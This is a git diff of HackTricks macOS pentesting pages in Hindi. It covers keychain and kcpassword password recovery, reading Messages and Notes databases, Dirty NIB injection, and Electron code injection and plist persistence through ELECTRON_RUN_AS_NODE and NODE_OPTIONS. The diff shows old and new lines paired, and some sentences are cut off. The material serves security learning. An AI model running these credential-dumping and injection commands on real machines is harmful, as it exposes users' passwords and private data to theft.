[इन चरणों का पालन करें](..#dumping-memory-with-osxpmem) **मेमोरी डंप** करने के लिए
[इन चरणों का पालन करें](..#dumping-memory-with-osxpmem) एक **मेमोरी डंप** करने के लिए
```bash
#Use volafox (https://github.com/n0fate/volafox) to extract possible keychain passwords
# Unformtunately volafox isn't working with the latest versions of MacOS
@ -117,23 +114,23 @@ python vol.py -i ~/Desktop/show/macosxml.mem -o keychaindump
#Try to extract the passwords using the extracted keychain passwords
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain
```
### **उपयोगकर्ता के पासवर्ड का उपयोग करके keychain कुंजियों को डंप करें (पासवर्ड के साथ)**
#### **उपयोगकर्ता के पासवर्ड का उपयोग करके कीचेन कुंजी (साथ में पासवर्ड) डंप करें**
यदि आप उपयोगकर्ता का पासवर्ड जानते हैं तो आप इसका उपयोग **उपयोगकर्ता के संबंधित keychain को डंप करने और डिक्रिप्ट करने** के लिए कर सकते हैं।
यदि आप उपयोगकर्ता का पासवर्ड जानते हैं तो आप इसका उपयोग करके **उपयोगकर्ता की कीचेन कुंजियों को डंप और डिक्रिप्ट** कर सकते हैं।
```bash
#Prompt to ask for the password
python2.7 chainbreaker.py --dump-all --password-prompt /Users/<username>/Library/Keychains/login.keychain-db
```
### kcpassword
**kcpassword** फ़ाइल एक ऐसी फ़ाइल है जिसमें **उपयोगकर्ता का लॉगिन पासवर्ड** होता है, लेकिन केवल तब जब सिस्टम के मालिक ने **स्वचालित लॉगिन सक्षम** किया हो। इसलिए, उपयोगकर्ता को बिना पासवर्ड मांगे स्वतः ही लॉग इन किया जाएगा (जो कि बहुत सुरक्षित नहीं है)।
**kcpassword** फ़ाइल एक फ़ाइल है जो **उपयोगकर्ता का लॉगिन पासवर्ड** रखती है, लेकिन केवल तभी जब सिस्टम के मालिक ने **स्वचालित लॉगिन** को सक्षम किया है। इसलिए, उपयोगकर्ता को पासवर्ड के बिना स्वचालित रूप से लॉग इन किया जाएगा (जो बहुत ही सुरक्षित नहीं है)।
पासवर्ड फ़ाइल **`/etc/kcpassword`** में की **`0x7D 0x89 0x52 0x23 0xD2 0xBC 0xDD 0xEA 0xA3 0xB9 0x1F`** के साथ xored होता है। अगर उपयोगकर्ता का पासवर्ड की से लंबा होता है, तो की का पुन: उपयोग किया जाएगा।\
इससे पासवर्ड को पुनः प्राप्त करना काफी आसान हो जाता है, उदाहरण के लिए [**इस स्क्रिप्ट**](https://gist.github.com/opshope/32f65875d45215c3677d) का उपयोग करके।
पासवर्ड **`/etc/kcpassword`** फ़ाइल में **`0x7D 0x89 0x52 0x23 0xD2 0xBC 0xDD 0xEA 0xA3 0xB9 0x1F`** कुंजी के साथ xored रूप में संग्रहीत है। अगर उपयोगकर्ता का पासवर्ड कुंजी से लंबा है, तो कुंजी का पुनः उपयोग किया जाएगा।\
इससे पासवर्ड को पुनः प्राप्त करना काफी आसान बना देता है, उदाहरण के लिए [**इस**](https://gist.github.com/opshope/32f65875d45215c3677d) जैसे स्क्रिप्ट का उपयोग करके।
## डेटाबेस में रोचक जानकारी
## डेटाबेस में दिलचस्प जानकारी
### Messages
### संदेश
```bash
sqlite3 $HOME/Library/Messages/chat.db .tables
sqlite3 $HOME/Library/Messages/chat.db 'select * from message'
@ -143,36 +140,36 @@ sqlite3 $HOME/Suggestions/snippets.db 'select * from emailSnippets'
```
### सूचनाएं
आप सूचनाओं का डेटा `$(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/` में पा सकते हैं।
आप `$(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/` में सूचनाएं डेटा पा सकते हैं।
अधिकांश रोचक जानकारी **blob** में होगी। इसलिए आपको उस सामग्री को **निकालना** होगा और उसे **मानव** **पठनीय** रूप में **परिवर्तित** करना होगा या **`strings`** का उपयोग करना होगा। इसे एक्सेस करने के लिए आप कर सकते हैं:
{% code overflow="wrap" %}
अधिकांश दिलचस्प जानकारी **ब्लॉब** में होगी। इसलिए आपको उस सामग्री को **निकालना** होगा और **मानव** **पठनीय** बनाना होगा या **`strings`** का उपयोग करना होगा। इस तक पहुंचने के लिए आप कर सकते हैं:
```bash
cd $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/
strings $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/db2/db | grep -i -A4 slack
```
### नोट्स
### नोट
उपयोगकर्ता के **नोट्स** `~/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite` में पाए जा सकते हैं।
उपयोगकर्ताओं के **नोट** यहाँ मिल सकते हैं `~/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite`
{% code overflow="wrap" %}
{% endcode %}
```bash
sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite .tables
#To dump it in a readable format:
for i in $(sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite "select Z_PK from ZICNOTEDATA;"); do sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite "select writefile('body1.gz.z', ZDATA) from ZICNOTEDATA where Z_PK = '$i';"; zcat body1.gz.Z ; done
```
{% endcode %}
<details>
<summary><strong>शून्य से नायक तक AWS हैकिंग सीखें</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
दूसरे तरीके HackTricks का समर्थन करने के लिए:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहत हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपोज़ में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details>

View file

@ -2,27 +2,32 @@
<details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert) के साथ</strong></a><strong>!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी कंपनी का विज्ञापन **HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सदस्यता योजनाएं देखें**](https://github.com/sponsors/carlospolop)!
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos।
* **हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में
</details>
**तकनीक के बारे में अधिक विवरण के लिए मूल पोस्ट देखें: [https://blog.xpnsec.com/dirtynib/**](https://blog.xpnsec.com/dirtynib/)**। यहां एक सारांश है:
**तकनीक के बारे में अधिक विवरण के लिए मूल पोस्ट देखें: [https://blog.xpnsec.com/dirtynib/**](https://blog.xpnsec.com/dirtynib/).** यहाँ एक सारांश है:
NIB फ़ाइलें, Apple के विकास पारिस्थितिकी का हिस्सा, एप्लिकेशन में **UI तत्वों** और उनके बीच के अंतर्क्रियाएँ परिभाषित करने के लिए हैं। वे विंडोज और बटन्स जैसे सिरीयलाइज़ड ऑब्जेक्ट्स को शामिल करते हैं, और रनटाइम पर लोड किए जाते हैं। इनके लगातार उपयोग के बावजूद, Apple अब अधिक समग्र UI फ्लो विज़ुअलाइज़ेशन के लिए स्टोरीबोर्ड का समर्थन करता है।
NIB फ़ाइलें, Apple के विकास पारिस्थितिकी का हिस्सा, एप्लिकेशन में **UI तत्वों** और उनके बीच के अंतराक्रियाओं को परिभाषित करने के लिए हैं। इनमें विंडोज और बटन्स जैसे सिरीयलाइज़ड ऑब्जेक्ट्स शामिल हैं, और रनटाइम पर लोड किए जाते हैं। इनके लगातार उपयोग के बावजूद, Apple अब अधिक समग्र UI फ्लो विज़ुअलाइज़ेशन के लिए स्टोरीबोर्ड का समर्थन करता है।
### NIB फ़ाइलों के साथ सुरक्षा संबंधित चिंताएँ
**NIB फ़ाइलें सुरक्षा जोखिम** हो सकती हैं। उनमें **विचारहीन कमांड्स को निष्पादित** करने की क्षमता होती है, और एप्लिकेशन में NIB फ़ाइलों में परिवर्तन Gatekeeper को एप्लिकेशन को निष्पादित करने से नहीं रोकते, जो एक महत्वपूर्ण धमाका है।
**NIB फ़ाइलें सुरक्षा जोखिम** हो सकती हैं। इनमें **विचारशील कमांड्स को निष्पादित** करने की क्षमता होती है, और एप्लिकेशन के भीतर NIB फ़ाइलों में परिवर्तन Gatekeeper को एप्लिकेशन को निष्पादित करने से नहीं रोकते, जो एक महत्वपूर्ण खतरा प्रस्तुत करता है।
### डर्टी NIB इंजेक्शन प्रक्रिया
#### NIB फ़ाइल बनाना और सेटअप करना
1. **प्रारंभिक सेटअप**:
- XCode का उपयोग करके एक नई NIB फ़ाइल बनाएं।
- इंटरफेस में एक ऑब्ज
- इंटरफ़ेस में एक ऑब्जेक्ट जोड़ें, जिसका क्लास `NSAppleScript` पर सेट करें।
- उपयोगकर्ता परिभाषित रनटाइम गुणों के माध्यम से प्रारंभिक `source` गुण कॉन्फ़िगर करें।
2. **कोड निष्पादन गैजेट**:
- सेटअप करता है कि AppleScript को मांग पर चलाया जा सके।
- `Apple Script` ऑब्ज

View file

@ -1,41 +1,41 @@
# macOS Electron एप्लिकेशन्स इंजेक्शन
# macOS इलेक्ट्रॉन एप्लिकेशन्स इंजेक्शन
<details>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
<summary><strong>जीरो से हीरो तक AWS हैकिंग सीखें</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का पालन करें.**
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें.
* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **मुझे** **ट्विटर** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** का** **अनुसरण** करें।
* **अपने हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details>
## मूल जानकारी
यदि आपको नहीं पता कि Electron क्या है, तो आप [**यहाँ बहुत सारी जानकारी पा सकते हैं**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps). लेकिन अभी के लिए बस जान लें कि Electron **node** चलाता है.\
और node में कुछ **पैरामीटर्स** और **env वेरिएबल्स** होते हैं जिनका उपयोग करके **अन्य कोड को निष्पादित करने** के लिए किया जा सकता है, निर्दिष्ट फाइल के अलावा.
अगर आपको पता नहीं है कि इलेक्ट्रॉन क्या है, तो आप [**यहाँ बहुत सारी जानकारी पा सकते हैं**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps)। लेकिन अब तक यह जान लें कि इलेक्ट्रॉन **नोड** चलाता है।\
और नोड के कुछ **पैरामीटर** और **एनवायरनमेंट वेरिएबल्स** हैं जो **इसे इंजेक्शन करने** के लिए उपयोग किया जा सकता है निर्दिष्ट फ़ाइल के अलावा।
### Electron Fuses
### इलेक्ट्रॉन फ्यूज़
ये तकनीकें आगे चर्चा की जाएंगी, लेकिन हाल के समय में Electron ने कई **सुरक्षा झंडे जोड़े हैं उन्हें रोकने के लिए**. ये हैं [**Electron Fuses**](https://www.electronjs.org/docs/latest/tutorial/fuses) और ये वे हैं जो macOS में Electron एप्लिकेशन्स को **मनमाने कोड लोड करने से रोकते हैं**:
इन तकनीकों पर आगे चर्चा की जाएगी, लेकिन हाल के समय में इलेक्ट्रॉन ने इन्हें रोकने के लिए कई **सुरक्षा झंडे जोड़े हैं**। ये हैं [**इलेक्ट्रॉन फ्यूज़**](https://www.electronjs.org/docs/latest/tutorial/fuses) और ये वे हैं जो इलेक्ट्रॉन ऐप्स को macOS में **अर्बिट्रे कोड लोड करने से रोकने** के लिए उपयोग किए जाते हैं:
* **`RunAsNode`**: यदि निष्क्रिय किया गया है, तो यह env var **`ELECTRON_RUN_AS_NODE`** का उपयोग करके कोड इंजेक्ट करने से रोकता है.
* **`EnableNodeCliInspectArguments`**: यदि निष्क्रिय किया गया है, तो पैरामीटर्स जैसे कि `--inspect`, `--inspect-brk` का सम्मान नहीं किया जाएगा. इस तरह से कोड इंजेक्ट करने से बचते हैं.
* **`EnableEmbeddedAsarIntegrityValidation`**: यदि सक्षम किया गया है, तो लोड की गई **`asar`** **फाइल** को macOS द्वारा **मान्य** किया जाएगा. इस तरह से इस फाइल की सामग्री को संशोधित करके **कोड इंजेक्शन** को **रोकता** है.
* **`OnlyLoadAppFromAsar`**: यदि यह सक्षम है, तो इसके बजाय कि निम्नलिखित क्रम में लोड करने की खोज की जाए: **`app.asar`**, **`app`** और अंत में **`default_app.asar`**. यह केवल app.asar की जांच करेगा और उपयोग करेगा, इस प्रकार यह सुनिश्चित करता है कि जब **`embeddedAsarIntegrityValidation`** फ्यूज के साथ **संयुक्त** होता है तो यह **असंभव** है कि **मान्य नहीं किए गए कोड को लोड करें**.
* **`LoadBrowserProcessSpecificV8Snapshot`**: यदि सक्षम है, तो ब्राउज़र प्रक्रिया अपने V8 स्नैपशॉट के लिए `browser_v8_context_snapshot.bin` नामक फाइल का उपयोग करती है.
* **`RunAsNode`**: यदि यह अक्षम है, तो यह एनवायरनमेंट वेरिएबल **`ELECTRON_RUN_AS_NODE`** का उपयोग कोड इंजेक्ट करने से रोकता है
* **`EnableNodeCliInspectArguments`**: यदि यह अक्षम है, तो `--inspect`, `--inspect-brk` जैसे पैरामीटर सम्मानित नहीं किए जाएंगे। इस तरह कोड इंजेक्शन से बचाया जाएगा।
* **`EnableEmbeddedAsarIntegrityValidation`**: यदि सक्षम है, तो लोड किया गया **`asar`** **फ़ाइल** macOS द्वारा **सत्यापित** किया जाएगा। इस तरह कोड इंजेक्शन से बचाया जाएगा जिसमें इस फ़ाइल की सामग्री को संशोधित किया जाता है।
* **`OnlyLoadAppFromAsar`**: यदि यह सक्षम है, तो निम्नलिखित क्रम में लोड करने की जगह खोजने की बजाय: **`app.asar`**, **`app`** और अंत में **`default_app.asar`**। यह केवल app.asar की जाँच करेगा और उसका उपयोग करेगा, इसलिए जब **`embeddedAsarIntegrityValidation`** फ्यूज़ के साथ मिलाकर उपयोग किया जाए, तो **सत्यापित कोड लोड करना असंभव** होगा।
* **`LoadBrowserProcessSpecificV8Snapshot`**: यदि सक्षम है, तो ब्राउज़र प्रक्रिया `browser_v8_context_snapshot.bin` फ़ाइल का उपयोग अपने V8 स्नैपशॉट के लिए करेगी।
एक और दिलचस्प फ्यूज जो कोड इंजेक्शन को रोक नहीं हा है:
एक और दिलचस्प फ्यूज जो कोड इंजेक्शन को रोकने वाला नहीं होगा है:
* **EnableCookieEncryption**: यदि सक्षम है, तो डिस्क पर कुकी स्टोर OS स्तर की क्रिप्टोग्राफी कुंजियों का उपयोग करके एन्क्रिप्टेड होता है.
* **EnableCookieEncryption**: यदि सक्षम है, तो डिस्क पर कुकी स्टोर OS स्तर के एनक्रिप्शन कुंजियों का उपयोग करके एन्क्रिप्ट किया जाता है।
### Electron Fuses की जांच करना
### इलेक्ट्रॉन फ्यूज़ की जाँच
आप एक एप्लिकेशन से इन झंडों की **जांच कर सकते हैं** :
आप एक एप्लिकेशन से **इन झंडों की जाँच** कर सकते हैं:
```bash
npx @electron/fuses read --app /Applications/Slack.app
@ -51,45 +51,45 @@ LoadBrowserProcessSpecificV8Snapshot is Disabled
```
### इलेक्ट्रॉन फ्यूज़ को संशोधित करना
जैसा कि [**डॉक्स में उल्लेख है**](https://www.electronjs.org/docs/latest/tutorial/fuses#runasnode), **इलेक्ट्रॉन फ्यूज़**ी कॉन्फ़िगरेशन **इलेक्ट्रॉन बाइनरी** के अंदर कॉन्फ़िगर की जाती है जिसमें कहीं न कहीं स्ट्रिंग **`dL7pKGdnNz796PbbjQWNKmHXBZaB9tsX`** होती है।
जैसा कि [**दस्तावेज़ उल्लेख करते हैं**](https://www.electronjs.org/docs/latest/tutorial/fuses#runasnode), **इलेक्ट्रॉन फ्यूज़**ा विन्यास **इलेक्ट्रॉन बाइनरी** में किया जाता है जिसमें कहीं **`dL7pKGdnNz796PbbjQWNKmHXBZaB9tsX`** स्ट्रिंग होती है।
macOS एप्लिकेशन्स में यह आमतौर पर `application.app/Contents/Frameworks/Electron Framework.framework/Electron Framework` में होता है।
macOS एप्लिकेशन में यह आम तौर पर `application.app/Contents/Frameworks/Electron Framework.framework/Electron Framework` में होता है।
```bash
grep -R "dL7pKGdnNz796PbbjQWNKmHXBZaB9tsX" Slack.app/
Binary file Slack.app//Contents/Frameworks/Electron Framework.framework/Versions/A/Electron Framework matches
```
आप इस फ़ाइल को [https://hexed.it/](https://hexed.it/) में लोड कर सकते हैं और पिछली स्ट्रिंग के लिए खोज कर सकते हैं। इस स्ट्रिंग के बाद आप ASCII में एक नंबर "0" या "1" देख सकते हैं जो दर्शाता है कि प्रत्येक फ्यूज अक्षम या सक्षम है। बस हेक्स कोड को मॉडिफाई करें (`0x30` है `0` और `0x31` है `1`) ताकि **फ्यूज मानों को संशोधित करें**
आप इस फ़ाइल को [https://hexed.it/](https://hexed.it/) में लोड कर सकते हैं और पिछले स्ट्रिंग की खोज कर सकते हैं। इस स्ट्रिंग के बाद, ASCII में एक संख्या "0" या "1" दिखाई देगी जो प्रत्येक फ्यूज़ को अक्षम या सक्षम करती है। फ्यूज़ मानों को **संशोधित** करने के लिए हेक्स कोड को संशोधित करें (`0x30` को `0` और `0x31` को `1` बनाएं)
<figure><img src="../../../.gitbook/assets/image (2) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../.gitbook/assets/image (2) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
ध्यान दें कि यदि आप इन बाइट्स को संशोधित करके किसी एप्लिकेशन के अंदर **`Electron Framework` बाइनरी** को **ओवरराइट** करने की कोशिश करते हैं, तो ऐप चलेगा नहीं
ध्यान दें कि यदि आप इस बाइट को संशोधित करके **`Electron Framework` बाइनरी** को एक एप्लिकेशन के अंदर अधिलेखित करने का प्रयास करें, तो ऐप नहीं चलेगा
## RCE इलेक्ट्रॉन एप्लिकेशन्स में कोड जोड़ना
## RCE कोड जोड़ना Electron एप्लिकेशन में
इलेक्ट्रॉन ऐप जो **बाहरी JS/HTML फ़ाइलें** इस्तेमाल कर रहा हो सकता है, तो एक हमलावर इन फ़ाइलों में कोड इंजेक्ट कर सकता है जिसकी हस्ताक्षर की जांच नहीं की जाएगी और ऐप के संदर्भ में मनमाना कोड निष्पादित कर सकता है।
एक Electron ऐप्लिकेशन का उपयोग करने वाले **बाहरी JS/HTML फ़ाइलें** हो सकती हैं, इसलिए एक हमलावर इन फ़ाइलों में कोड इंजेक्ट कर सकता है जिसका हस्ताक्षर जांचा नहीं जाएगा और ऐप के संदर्भ में विचित्र कोड को निष्पादित कर सकता है।
{% hint style="danger" %}
हालांकि, इस समय 2 सीमाएँ हैं:
* एक ऐप को संशोधित करने के लिए **`kTCCServiceSystemPolicyAppBundles`** अनुमति **आवश्यक** है, इसलिए डिफ़ॉल्ट रूप से यह अब संभव नहीं है।
* संकलित **`asap`** फ़ाइल में आमतौर पर फ्यूज **`embeddedAsarIntegrityValidation`** `और` **`onlyLoadAppFromAsar`** `सक्षम` होते हैं
* **`kTCCServiceSystemPolicyAppBundles`** अनुमति की आवश्यकता है एक ऐप को संशोधित करने के लिए, इसलिए डिफ़ॉल्ट रूप से यह अब संभव नहीं है।
* संकलित **`asap`** फ़ाइल में आम तौर पर फ्यूज **`embeddedAsarIntegrityValidation`** और **`onlyLoadAppFromAsar`** सक्षम होते हैं
इस हमले के मार्ग को अधिक जटिल (या असंभव) बनाते हैं।
इस हमले का मार्ग अधिक जटिल (या असंभव) बनाते हैं।
{% endhint %}
ध्यान दें कि **`kTCCServiceSystemPolicyAppBundles`** की आवश्यकता को बायपास करना संभव है, ऐप्लिकेशन को दूसरी डायरेक्टरी (जैसे **`/tmp`**) में कॉपी करके, फोल्डर **`app.app/Contents`** का नाम बदलकर **`app.app/NotCon`**, **संशोधित** करना आपके **दुर्भावनापूर्ण** कोड के साथ **asar** फ़ाइल, इसे वापस **`app.app/Contents`** के नाम पर बदलना और इसे निष्पादित करना
ध्यान दें कि **`kTCCServiceSystemPolicyAppBundles`** की आवश्यकता को छोड़ना संभव है एक अन्य निर्देशिका में एप्लिकेशन की कॉपी करके (जैसे **`/tmp`**), फ़ोल्डर **`app.app/Contents`** को **`app.app/NotCon`** नामक करके, अपने **हानिकारक** कोड के साथ **asar** फ़ाइल को संशोधित करके, इसे फिर से **`app.app/Contents`** नामक करके और इसे निष्पादित करके **संभव** है
आप asar फ़ाइल से कोड अनपैक कर सकते हैं:
आप एसार फ़ाइल से कोड को अनपैक कर सकते हैं:
```bash
npx asar extract app.asar app-decomp
```
और इसे संशोधित करने के बाद वापस पैक करें:
और उसे बाद में पैक करें जब आप इसे संशोधित कर चुके हों:
```bash
npx asar pack app-decomp app-new.asar
```
## `ELECTRON_RUN_AS_NODE` के साथ RCE <a href="#electron_run_as_node" id="electron_run_as_node"></a>
[**डॉक्स के अनुसार**](https://www.electronjs.org/docs/latest/api/environment-variables#electron\_run\_as\_node), यदि यह env वेरिएबल सेट है, तो यह प्रक्रिया क सामान्य Node.js प्रक्रिया के रूप में शुरू करेगा
[**दस्तावेज़**](https://www.electronjs.org/docs/latest/api/environment-variables#electron\_run\_as\_node) के अनुसार, यदि यह env variable सेट किया जाता है, तो यह प्रक्रिया क सामान्य Node.js प्रक्रिया के रूप में शुरू होगी
{% code overflow="wrap" %}
```bash
@ -101,12 +101,12 @@ require('child_process').execSync('/System/Applications/Calculator.app/Contents/
{% endcode %}
{% hint style="danger" %}
यदि fuse **`RunAsNode`** निष्क्रिय है तो env var **`ELECTRON_RUN_AS_NODE`** को नदेखा किया जाएगा, और यह काम नहीं करेगा।
यदि फ्यूज **`RunAsNode`** अक्षम है तो env var **`ELECTRON_RUN_AS_NODE`** को नजरअंदा किया जाएगा, और यह काम नहीं करेगा।
{% endhint %}
### App Plist से Injection
### एप्लिकेशन प्लिस्ट से इंजेक्शन
[**यहाँ प्रस्तावित**](https://www.trustedsec.com/blog/macos-injection-via-third-party-frameworks/) के अनुसार, आप इस env variable का उपयोग plist में कर सकते हैं ताकि पर्सिस्टेंस बनाए रखा जा सके:
जैसा कि [**यहाँ सुझाव दिया गया है**](https://www.trustedsec.com/blog/macos-injection-via-third-party-frameworks/), आप इस env वेरिएबल का दुरुपयोग कर सकते हैं एक प्लिस्ट में स्थिरता बनाए रखने के लिए:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
@ -132,9 +132,7 @@ require('child_process').execSync('/System/Applications/Calculator.app/Contents/
```
## `NODE_OPTIONS` के साथ RCE
आप पेलोड को एक अलग फाइल में संग्रहित कर सकते हैं और इसे निष्पादित कर सकते हैं:
{% code overflow="wrap" %}
आप पेयलोड को एक अलग फ़ाइल में स्टोर कर सकते हैं और इसे एक्सीक्यूट कर सकते हैं:
```bash
# Content of /tmp/payload.js
require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator');
@ -145,14 +143,14 @@ NODE_OPTIONS="--require /tmp/payload.js" ELECTRON_RUN_AS_NODE=1 /Applications/Di
{% endcode %}
{% hint style="danger" %}
यदि fuse **`EnableNodeOptionsEnvironmentVariable`** **निष्क्रिय** है, तो ऐप **NODE\_OPTIONS** env var को **अनदेखा** करेगा जब तक कि env variable **`ELECTRON_RUN_AS_NODE`** सेट नहीं किया जाता, जिसे भी **अनदेखा** किया जाएगा यदि fuse **`RunAsNode`** निष्क्रिय है।
यदि फ्यूज **`EnableNodeOptionsEnvironmentVariable`** **अक्षम** है, तो ऐप **NODE\_OPTIONS** एनवायरन्मेंट वेरिएबल को **अनदेखा** करेगा जब तक एनवायरन्मेंट वेरिएबल **`ELECTRON_RUN_AS_NODE`** सेट नहीं होता है, जिसे भी **अनदेखा** किया जाएगा अगर फ्यूज **`RunAsNode`** अक्षम है।
यदि आप **`ELECTRON_RUN_AS_NODE`** सेट नहीं करते हैं, तो आपको **त्रुटि** मिलेगी: `Most NODE_OPTIONs are not supported in packaged apps. See documentation for more details.`
अगर आप **`ELECTRON_RUN_AS_NODE`** सेट नहीं करते हैं, तो आपको **त्रुटि** मिलेगी: `Most NODE_OPTIONs are not supported in packaged apps. See documentation for more details.`
{% endhint %}
### App Plist से Injection
### एप्लिकेशन प्लिस्ट से इंजेक्शन
आप इस env variable का दुरुपयोग plist में इन कुंजियों को जोड़कर पर्सिस्टेंस बनाए रखने के लिए कर सकते हैं:
आप इस एनवायरन्मेंट वेरिएबल का दुरुपयोग कर सकते हैं एक प्लिस्ट में स्थायिति बनाने के लिए इन कुंजियों को जोड़कर:
```xml
<dict>
<key>EnvironmentVariables</key>
@ -168,12 +166,10 @@ NODE_OPTIONS="--require /tmp/payload.js" ELECTRON_RUN_AS_NODE=1 /Applications/Di
<true/>
</dict>
```
## RCE के साथ निरीक्षण
## RCE इंस्पेक्टिंग के साथ
